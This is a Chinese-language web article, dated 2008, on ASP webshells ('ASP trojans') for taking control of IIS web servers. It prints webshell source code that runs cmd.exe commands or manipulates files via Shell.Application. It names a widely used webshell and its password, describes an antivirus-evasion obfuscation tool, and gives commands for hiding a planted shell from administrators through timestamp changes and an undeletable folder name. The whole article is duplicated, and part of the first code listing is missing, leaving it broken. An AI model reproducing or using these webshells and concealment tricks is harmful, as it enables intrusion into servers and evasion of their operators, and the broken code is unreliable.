Asp腳本木馬技術(shù)
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 21:28:47 作者:佚名
我要評論

現(xiàn)在很多的站點,為便于建站和后臺管理,都使用ASP動態(tài)程序。但這也為整個站點的安全帶來很大隱患,現(xiàn)在典型的網(wǎng)站攻擊就是通過植入ASP木馬,從而得到系統(tǒng)的控制權(quán)。早期的asp木馬一般有數(shù)個文件,隨著asp木馬的易用性、隱蔽性以及強大的可執(zhí)行性,因此得到越來越的黑客和
現(xiàn)在很多的站點,為便于建站和后臺管理,都使用ASP動態(tài)程序。但這也為整個站點的安全帶來很大隱患,現(xiàn)在典型的網(wǎng)站攻擊就是通過植入ASP木馬,從而得到系統(tǒng)的控制權(quán)。早期的asp木馬一般有數(shù)個文件,隨著asp木馬的易用性、隱蔽性以及強大的可執(zhí)行性,因此得到越來越的黑客和入侵者的青睞,asp木馬技術(shù)也就水漲船高,現(xiàn)在的asp木馬文件已經(jīng)集成到一個文件,其大小也就二三十k,而且可以通過使用“asp木馬免殺工具2.0”等軟件來對asp源程序進行加密等方法,躲過防毒軟件對其的查殺。下面就對目前比較流行的木馬技術(shù)、木馬軟件以及木馬防殺毒技術(shù)進行介紹。
(一)木馬核心技術(shù)介紹
Asp木馬中最核心的技術(shù)就是利用腳本創(chuàng)建對象,然后利用cmd.exe命令來執(zhí)行對文件的創(chuàng)建、刪除以及修改等操作。下面就目前較為流行的利用FSO以及不利用FSO技術(shù)的木馬程序源代碼進行介紹。
說明:FSO是對FileSystemObject的簡稱,IIS4以及后續(xù)版本中的ASP的文件操作都可以通過FileSystemObject實現(xiàn),包括文本文件的讀寫目錄操作、文件的拷貝改名刪除等。FileSystemObject帶來方便的同時,也具有非常大的風(fēng)險性,利用FileSystemObject可以篡改并下載Fat以及FAT32分區(qū)上的任何文件,即使是ntfs,如果沒有對權(quán)限進行很好的設(shè)置,同樣也能遭到破壞。
1.使用FSO技術(shù)的asp木馬
codepage ="936" %>
<%
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
’使用Run方法創(chuàng)建一個新的進程,隱藏窗口并激活另一窗口,返回由應(yīng)用程序返回的任何錯誤代碼
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) ’打開臨時文件szTempFile
End If
%>
<HTML>
<body bgcolor="#C0C0C0" text="#000000">
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="執(zhí)行" class=input>
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
’ -- Read the output from our command and remove the temp file -- ’
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll) ’在網(wǎng)頁上輸出命令執(zhí)行的結(jié)果
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True) ’刪除臨時文件szTempFile
End If
%>
</BODY>
</HTML>
來調(diào)用常用的delete、copy、dir、net、netstat等一些DOS命令。
其原型為:
cmd.exe /c “dos命令” > “文件名稱”
如要查看c盤所有文件并將查看結(jié)果輸出到viewdrive_c.txt的命令為:
cmd.exe/c dir c:\ >viewdrive_c.txt
說明:“>”是將命令執(zhí)行的結(jié)果輸入到一個文件?!拔募Q”中如果沒有指定路徑則默認保存在當前目錄下。
注意:在輸入的命令之間要留一個空格。
三個腳本對象,接著執(zhí)行Dos命令解釋器并執(zhí)行所輸入的Dos命令,并將輸入其命令的執(zhí)行結(jié)果到一個臨時文件(szTempFile),然后打開臨時文件并將其結(jié)果回顯在網(wǎng)頁上,最后刪除臨時文件。運行結(jié)果如圖1所示。
2.非FSO技術(shù)的asp木馬
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=text value="<%=szCMD %>" size="20"> <font class=fonts>輸入要瀏覽的目錄,最后要加\</font><br>
<input type=text name=text1 value="<%=szCMD1 %>" size="20">copy
<input type=text name=text2 value="<%=szCMD2 %>" size="20"><br>
<input type=text name=text3 value="<%=szCMD3 %>" size="20">move
<input type=text name=text4 value="<%=szCMD4 %>" size="20"><br>路徑:
<input type=text name=text5 value="<%=szCMD5 %>" size="20">程序:
<input type=text name=text6 value="<%=szCMD6 %>" size="20"><br>
<input type=submit name=sb value=發(fā)送命令 class=input>
</form>
</table>
</center>
</body>
</html>
<%
szCMD = Request.Form("text") ’目錄瀏覽
if (szCMD <> "") then
set shell=server.createobject("shell.application") ’建立shell對象
set fod1=shell.namespace(szcmd)
set foditems=fod1.items
for each co in foditems
response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>"
next
end if
%>
<%
szCMD1 = Request.Form("text1") ’目錄拷貝,不能進行文件拷貝
szCMD2 = Request.Form("text2")
if szcmd1<>"" and szcmd2<>"" then
set shell1=server.createobject("shell.application") ’建立shell對象
set fod1=shell1.namespace(szcmd2)
for i=len(szcmd1) to 1 step -1
if mid(szcmd1,i,1)="\" then
path=left(szcmd1,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(szcmd1,len(szcmd1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
%>
<%
szCMD3 = Request.Form("text3") ’目錄移動
szCMD4 = Request.Form("text4")
if szcmd3<>"" and szcmd4<>"" then
set shell2=server.createobject("shell.application") ’建立shell對象
set fod1=shell2.namespace(szcmd4)
for i=len(szcmd3) to 1 step -1
if mid(szcmd3,i,1)="\" then
path=left(szcmd3,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(szcmd3,len(szcmd3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
%>
<%
szCMD5 = Request.Form("text5") ’執(zhí)行程序到指定路徑
szCMD6 = Request.Form("text6")
if szcmd5<>"" and szcmd6<>"" then
set shell3=server.createobject("shell.application") ’建立shell對象
shell3.namespace(szcmd5).items.item(szcmd6).invokeverb
response.write "command completed success!"
end if
%>
以上代碼運行結(jié)果如圖2所示。不使用FSO技術(shù)的ASP木馬是創(chuàng)建一個Shell.Application對象,然后通過shell.namespace來對創(chuàng)建的對象進行操作。通過使用該種方法雖然不能執(zhí)行net、del以及netstat等命令,但是它可以復(fù)制、移動文件及其文件夾以及執(zhí)行系統(tǒng)中存在的特定程序。不過在每執(zhí)行一次應(yīng)用程序時都會打開一個進程,而且可能會報錯,通過任務(wù)控制器可以查看其打開的進程。
說明:Shell.Application對象提供了NameSpace(文件夾名)、CopyHere(<源>[,選項標志])和MoveHere(<源>[,選項標志])方法。NameSpace()方法可以得到文件夾的屬性,CopyHere()和MoveHere()分別對文件夾進行拷貝和移動。
(二)常用的asp木馬軟件
1.海陽頂端網(wǎng)asp木馬
在眾多的asp木馬中,海陽頂端網(wǎng)asp木馬應(yīng)該是比較成熟的,也是用得最多的asp木馬,就其版本而言,到目前為止已經(jīng)推出了數(shù)個版本:海陽頂端網(wǎng)asp木馬第一版、海陽頂端網(wǎng)asp木馬xp版、海陽頂端網(wǎng)asp木馬xp-net版、海陽頂端網(wǎng)asp木馬2003版、海陽頂端asp木馬安裝插件版以及海陽頂端網(wǎng)asp木馬2005版。早期的海陽頂端網(wǎng)asp木馬一般都有數(shù)個asp文件,后期的asp木馬把所有的文件都集成到一個文件中了,例如xp版和xp-net版集成后的文件大小也就二十多k。海陽頂端網(wǎng)asp木馬是用asp腳本語言編寫,提供在線更改、編輯、刪除任意文件。如果服務(wù)器上存在asp木馬程序,那么該服務(wù)器基本上就#¥%了。海陽頂端網(wǎng)asp木馬xp-net版初次運行界面如圖3所示,在下方的輸入密碼框中輸入“haiyangtop.126.com”后可以使用其集成功能的界面(圖4)。在該界面中可以方便的切換盤符,瀏覽、編輯、刪除和復(fù)制指定盤符下所選中的文件。使用該木馬來操作文件就如同在本機上操作文件一樣方便。
2.a(chǎn)sp木馬免殺工具2.0
asp木馬免殺工具2.0是一款對asp源代碼進行加密的工具(圖5)。大小為545k,其中asp.exe為主程序,運行程序后選擇源木馬文件,然后先單擊“轉(zhuǎn)換”,最后單擊“加密”即可生成一個加密的asp木馬網(wǎng)頁文件。
3.思易ASP木馬追捕2.0
、adodb.stream對象或者使用了其中的某些方法進行檢查,可以對利用變量創(chuàng)建對象、靜態(tài)對象以及自定義的關(guān)鍵字等進行搜索。不過該程序當對較大文件的檢索可能導(dǎo)致IIS停止響應(yīng),甚至可能導(dǎo)致服務(wù)器宕機,其運行界面如圖6所示。
(三)asp木馬防毒技術(shù)
在攻克主機植入asp木馬后,為了保護好自己的戰(zhàn)利品,防止系統(tǒng)管理員發(fā)現(xiàn),黑客一般情況下都會對asp木馬進行保護,往往通過加密、更改時間以及使用特殊字符等手段來逃過被殺毒軟件的查出和避免系統(tǒng)管理員的發(fā)現(xiàn)。下面就對其經(jīng)常使用的方法進行講解。
1.利用軟件對asp源代碼加密
目前有很多軟件可以對asp源代碼進行加密,例如asp木馬免殺工具2.0等。其原理是采用一定的算法將源代碼或者源代碼中的關(guān)鍵字進行某種轉(zhuǎn)換,經(jīng)過轉(zhuǎn)換后,源代碼已經(jīng)變?yōu)閬y碼或者顯示為特定的字符形式。但是隨著殺毒技術(shù)的提高和版本的升級,經(jīng)過加密后的asp木馬仍然不能保證躲過殺毒軟件的查殺。
2.修改asp木馬文件的時間
asp木馬上傳到服務(wù)器后,即使非常隱蔽,但是其文件修改時間的變化在正常文件中很容易被發(fā)現(xiàn),因此有人通過修改木馬源程序文件的時間跟在服務(wù)器上的正常文件的時間一致來逃過被管理員發(fā)現(xiàn)。
3.利用特殊字符"\"來保護asp木馬
Windows在設(shè)計時已經(jīng)考慮到不能使用“\”來作為文件及其文件夾的名字,但是在使用cmd.exe命令來創(chuàng)建文件時,如果其文件名中包含了“\”,則該文件名中的“\”將被忽略,但是所建立的文件夾還是會成功,只是不會顯示“\”(圖7)。利用"\"字符來保護asp木馬文件的原理為:在IIS設(shè)置的目錄下創(chuàng)建一個形入“a…\”的文件夾,然后將木馬文件復(fù)制到該文件夾中。復(fù)制成功后,可以在瀏覽其中輸入如下地址運行木馬文件http://localhost/aspmuma/asp.../xp.asp
說明:其中我們將xp.asp木馬文件復(fù)制到“asp…/”目錄中,其創(chuàng)建命令如下:
mkdir a…\
copy xp.asp a…\
創(chuàng)建成功后,可以在瀏覽器中看到一個為“a”的文件夾,但不能打開和刪除該文件夾,從而達到保護asp木馬文件的目的。
(一)木馬核心技術(shù)介紹
Asp木馬中最核心的技術(shù)就是利用腳本創(chuàng)建對象,然后利用cmd.exe命令來執(zhí)行對文件的創(chuàng)建、刪除以及修改等操作。下面就目前較為流行的利用FSO以及不利用FSO技術(shù)的木馬程序源代碼進行介紹。
說明:FSO是對FileSystemObject的簡稱,IIS4以及后續(xù)版本中的ASP的文件操作都可以通過FileSystemObject實現(xiàn),包括文本文件的讀寫目錄操作、文件的拷貝改名刪除等。FileSystemObject帶來方便的同時,也具有非常大的風(fēng)險性,利用FileSystemObject可以篡改并下載Fat以及FAT32分區(qū)上的任何文件,即使是ntfs,如果沒有對權(quán)限進行很好的設(shè)置,同樣也能遭到破壞。
1.使用FSO技術(shù)的asp木馬
codepage ="936" %>
<%
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
’使用Run方法創(chuàng)建一個新的進程,隱藏窗口并激活另一窗口,返回由應(yīng)用程序返回的任何錯誤代碼
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) ’打開臨時文件szTempFile
End If
%>
<HTML>
<body bgcolor="#C0C0C0" text="#000000">
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="執(zhí)行" class=input>
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
’ -- Read the output from our command and remove the temp file -- ’
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll) ’在網(wǎng)頁上輸出命令執(zhí)行的結(jié)果
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True) ’刪除臨時文件szTempFile
End If
%>
</BODY>
</HTML>
來調(diào)用常用的delete、copy、dir、net、netstat等一些DOS命令。
其原型為:
cmd.exe /c “dos命令” > “文件名稱”
如要查看c盤所有文件并將查看結(jié)果輸出到viewdrive_c.txt的命令為:
cmd.exe/c dir c:\ >viewdrive_c.txt
說明:“>”是將命令執(zhí)行的結(jié)果輸入到一個文件?!拔募Q”中如果沒有指定路徑則默認保存在當前目錄下。
注意:在輸入的命令之間要留一個空格。
三個腳本對象,接著執(zhí)行Dos命令解釋器并執(zhí)行所輸入的Dos命令,并將輸入其命令的執(zhí)行結(jié)果到一個臨時文件(szTempFile),然后打開臨時文件并將其結(jié)果回顯在網(wǎng)頁上,最后刪除臨時文件。運行結(jié)果如圖1所示。
2.非FSO技術(shù)的asp木馬
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=text value="<%=szCMD %>" size="20"> <font class=fonts>輸入要瀏覽的目錄,最后要加\</font><br>
<input type=text name=text1 value="<%=szCMD1 %>" size="20">copy
<input type=text name=text2 value="<%=szCMD2 %>" size="20"><br>
<input type=text name=text3 value="<%=szCMD3 %>" size="20">move
<input type=text name=text4 value="<%=szCMD4 %>" size="20"><br>路徑:
<input type=text name=text5 value="<%=szCMD5 %>" size="20">程序:
<input type=text name=text6 value="<%=szCMD6 %>" size="20"><br>
<input type=submit name=sb value=發(fā)送命令 class=input>
</form>
</table>
</center>
</body>
</html>
<%
szCMD = Request.Form("text") ’目錄瀏覽
if (szCMD <> "") then
set shell=server.createobject("shell.application") ’建立shell對象
set fod1=shell.namespace(szcmd)
set foditems=fod1.items
for each co in foditems
response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>"
next
end if
%>
<%
szCMD1 = Request.Form("text1") ’目錄拷貝,不能進行文件拷貝
szCMD2 = Request.Form("text2")
if szcmd1<>"" and szcmd2<>"" then
set shell1=server.createobject("shell.application") ’建立shell對象
set fod1=shell1.namespace(szcmd2)
for i=len(szcmd1) to 1 step -1
if mid(szcmd1,i,1)="\" then
path=left(szcmd1,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(szcmd1,len(szcmd1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
%>
<%
szCMD3 = Request.Form("text3") ’目錄移動
szCMD4 = Request.Form("text4")
if szcmd3<>"" and szcmd4<>"" then
set shell2=server.createobject("shell.application") ’建立shell對象
set fod1=shell2.namespace(szcmd4)
for i=len(szcmd3) to 1 step -1
if mid(szcmd3,i,1)="\" then
path=left(szcmd3,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(szcmd3,len(szcmd3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
%>
<%
szCMD5 = Request.Form("text5") ’執(zhí)行程序到指定路徑
szCMD6 = Request.Form("text6")
if szcmd5<>"" and szcmd6<>"" then
set shell3=server.createobject("shell.application") ’建立shell對象
shell3.namespace(szcmd5).items.item(szcmd6).invokeverb
response.write "command completed success!"
end if
%>
以上代碼運行結(jié)果如圖2所示。不使用FSO技術(shù)的ASP木馬是創(chuàng)建一個Shell.Application對象,然后通過shell.namespace來對創(chuàng)建的對象進行操作。通過使用該種方法雖然不能執(zhí)行net、del以及netstat等命令,但是它可以復(fù)制、移動文件及其文件夾以及執(zhí)行系統(tǒng)中存在的特定程序。不過在每執(zhí)行一次應(yīng)用程序時都會打開一個進程,而且可能會報錯,通過任務(wù)控制器可以查看其打開的進程。
說明:Shell.Application對象提供了NameSpace(文件夾名)、CopyHere(<源>[,選項標志])和MoveHere(<源>[,選項標志])方法。NameSpace()方法可以得到文件夾的屬性,CopyHere()和MoveHere()分別對文件夾進行拷貝和移動。
(二)常用的asp木馬軟件
1.海陽頂端網(wǎng)asp木馬
在眾多的asp木馬中,海陽頂端網(wǎng)asp木馬應(yīng)該是比較成熟的,也是用得最多的asp木馬,就其版本而言,到目前為止已經(jīng)推出了數(shù)個版本:海陽頂端網(wǎng)asp木馬第一版、海陽頂端網(wǎng)asp木馬xp版、海陽頂端網(wǎng)asp木馬xp-net版、海陽頂端網(wǎng)asp木馬2003版、海陽頂端asp木馬安裝插件版以及海陽頂端網(wǎng)asp木馬2005版。早期的海陽頂端網(wǎng)asp木馬一般都有數(shù)個asp文件,后期的asp木馬把所有的文件都集成到一個文件中了,例如xp版和xp-net版集成后的文件大小也就二十多k。海陽頂端網(wǎng)asp木馬是用asp腳本語言編寫,提供在線更改、編輯、刪除任意文件。如果服務(wù)器上存在asp木馬程序,那么該服務(wù)器基本上就#¥%了。海陽頂端網(wǎng)asp木馬xp-net版初次運行界面如圖3所示,在下方的輸入密碼框中輸入“haiyangtop.126.com”后可以使用其集成功能的界面(圖4)。在該界面中可以方便的切換盤符,瀏覽、編輯、刪除和復(fù)制指定盤符下所選中的文件。使用該木馬來操作文件就如同在本機上操作文件一樣方便。
2.a(chǎn)sp木馬免殺工具2.0
asp木馬免殺工具2.0是一款對asp源代碼進行加密的工具(圖5)。大小為545k,其中asp.exe為主程序,運行程序后選擇源木馬文件,然后先單擊“轉(zhuǎn)換”,最后單擊“加密”即可生成一個加密的asp木馬網(wǎng)頁文件。
3.思易ASP木馬追捕2.0
、adodb.stream對象或者使用了其中的某些方法進行檢查,可以對利用變量創(chuàng)建對象、靜態(tài)對象以及自定義的關(guān)鍵字等進行搜索。不過該程序當對較大文件的檢索可能導(dǎo)致IIS停止響應(yīng),甚至可能導(dǎo)致服務(wù)器宕機,其運行界面如圖6所示。
(三)asp木馬防毒技術(shù)
在攻克主機植入asp木馬后,為了保護好自己的戰(zhàn)利品,防止系統(tǒng)管理員發(fā)現(xiàn),黑客一般情況下都會對asp木馬進行保護,往往通過加密、更改時間以及使用特殊字符等手段來逃過被殺毒軟件的查出和避免系統(tǒng)管理員的發(fā)現(xiàn)。下面就對其經(jīng)常使用的方法進行講解。
1.利用軟件對asp源代碼加密
目前有很多軟件可以對asp源代碼進行加密,例如asp木馬免殺工具2.0等。其原理是采用一定的算法將源代碼或者源代碼中的關(guān)鍵字進行某種轉(zhuǎn)換,經(jīng)過轉(zhuǎn)換后,源代碼已經(jīng)變?yōu)閬y碼或者顯示為特定的字符形式。但是隨著殺毒技術(shù)的提高和版本的升級,經(jīng)過加密后的asp木馬仍然不能保證躲過殺毒軟件的查殺。
2.修改asp木馬文件的時間
asp木馬上傳到服務(wù)器后,即使非常隱蔽,但是其文件修改時間的變化在正常文件中很容易被發(fā)現(xiàn),因此有人通過修改木馬源程序文件的時間跟在服務(wù)器上的正常文件的時間一致來逃過被管理員發(fā)現(xiàn)。
3.利用特殊字符"\"來保護asp木馬
Windows在設(shè)計時已經(jīng)考慮到不能使用“\”來作為文件及其文件夾的名字,但是在使用cmd.exe命令來創(chuàng)建文件時,如果其文件名中包含了“\”,則該文件名中的“\”將被忽略,但是所建立的文件夾還是會成功,只是不會顯示“\”(圖7)。利用"\"字符來保護asp木馬文件的原理為:在IIS設(shè)置的目錄下創(chuàng)建一個形入“a…\”的文件夾,然后將木馬文件復(fù)制到該文件夾中。復(fù)制成功后,可以在瀏覽其中輸入如下地址運行木馬文件http://localhost/aspmuma/asp.../xp.asp
說明:其中我們將xp.asp木馬文件復(fù)制到“asp…/”目錄中,其創(chuàng)建命令如下:
mkdir a…\
copy xp.asp a…\
創(chuàng)建成功后,可以在瀏覽器中看到一個為“a”的文件夾,但不能打開和刪除該文件夾,從而達到保護asp木馬文件的目的。
相關(guān)文章
- 1.名稱:如何制作圖片ASP木馬 (可顯示圖片) 建一個asp文件,內(nèi)容為<!--#i nclude file="ating.jpg"--> 找一個正常圖片ating.jpg,插入一句話木2008-10-08
- 一、傳統(tǒng)的捆綁器 這種原理很簡單,也是目前用的最多的一種。就是將B.exe附加到A.exe的末尾。這樣當A.exe被執(zhí)行的時候,B.exe也跟著執(zhí)行了。這種捆綁器的代碼是滿2008-10-08
- 常用的木馬免殺方法絕招一:快速搞定瑞星文件查殺操作步驟: 第一步:用OD載入,來到程序的入口點?!?...常用的木馬免殺方法 絕招一:快速搞定瑞星文件查殺 操作步驟:2009-03-07
- 隨著云計算、物聯(lián)網(wǎng)、移動互聯(lián)網(wǎng)和人工智能技術(shù)的快速普及,API安全已經(jīng)成為當下企業(yè)和互聯(lián)網(wǎng)面臨的最嚴峻的網(wǎng)絡(luò)安全挑戰(zhàn)之一2009-06-09
- 木馬的最大的特點之一就是它一定是要和系統(tǒng)一起啟動而啟動,否則它就完全失去了意義!下面為大家介紹一下它的幾種隱藏啟動的方法: 方法一:注冊表啟動項:這個大2008-10-08
- 目前常見的木馬有三種 正向連接木馬 反彈連接木馬 收信木馬 正向連接木馬,所謂正向,就是在中馬者在機器上開個端口,而我們?nèi)ミB接他的端口。而我們要知道他的IP,才2008-10-08
- 目前常見的木馬有三種 正向連接木馬 反彈連接木馬 收信木馬 正向連接木馬,所謂正向,就是在中馬者在機器上開個端口,而我們?nèi)ミB接他的端口。而我們要知道他的IP,才2008-10-08
- 常見的網(wǎng)頁木馬攻擊手段有哪些?用戶應(yīng)該如何識別及防御來自網(wǎng)頁木馬的攻擊?筆者將在本文為用戶細細道來:2015-09-21
什么是惡意網(wǎng)站?詳解2016最新的釣魚、黑客入侵、木馬病毒教程
大家都知道惡意網(wǎng)站在我們平時上網(wǎng)的時候并不少見,最常見的就是扎起我們登錄qq和百度網(wǎng)頁中見到的一些,現(xiàn)在小編就為大家講解2016年最新黑客入侵教程2016-08-24- 現(xiàn)在大多數(shù)電腦技術(shù)人開始學(xué)習(xí)防范技術(shù)了,因為現(xiàn)在防范技術(shù)比攻擊技術(shù)要重要,下面就一起來看看如何手工查找后門木馬吧2016-08-24